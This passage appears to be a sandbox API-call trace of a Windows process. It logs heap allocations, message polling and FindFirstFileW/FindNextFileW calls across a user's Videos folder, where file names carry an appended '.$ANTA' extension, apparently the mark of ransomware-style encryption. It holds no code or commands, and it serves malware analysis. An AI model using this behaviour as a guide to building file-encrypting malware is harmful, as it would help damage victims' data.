0x43c9de8 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.920] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5e4e3ff, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5e4e3ff, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9c50, cFileName=".", cAlternateFileName="")) returned 0x41ac640 [0096.921] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5e4e3ff, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5e4e3ff, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9c50, cFileName="..", cAlternateFileName="")) returned 1 [0096.921] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59636d0, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x59636d0, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5ae0cff, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xcc20, dwReserved0=0x0, dwReserved1=0x43c9c50, cFileName="-frmf8je.swf.$ANTA", cAlternateFileName="-FRMF8~1.$AN")) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.921] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.921] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0096.921] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.922] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.922] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0096.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0096.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e48 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.923] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.923] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0096.923] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc4486a0, ftCreationTime.dwHighDateTime=0x1d5e22e, ftLastAccessTime.dwLowDateTime=0x933d7700, ftLastAccessTime.dwHighDateTime=0x1d5ef87, ftLastWriteTime.dwLowDateTime=0x933d7700, ftLastWriteTime.dwHighDateTime=0x1d5ef87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="96vXR96flJJML", cAlternateFileName="96VXR9~1")) returned 1 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.923] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0096.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0096.924] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.924] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.925] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0096.925] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.925] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c120cb, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x5c120cb, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5e4e3ff, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.925] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.926] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e48 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.926] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.927] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.927] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x91451210, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x91451210, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="KW4s-- cgXZEZC", cAlternateFileName="KW4S--~1")) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.927] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0096.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0096.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 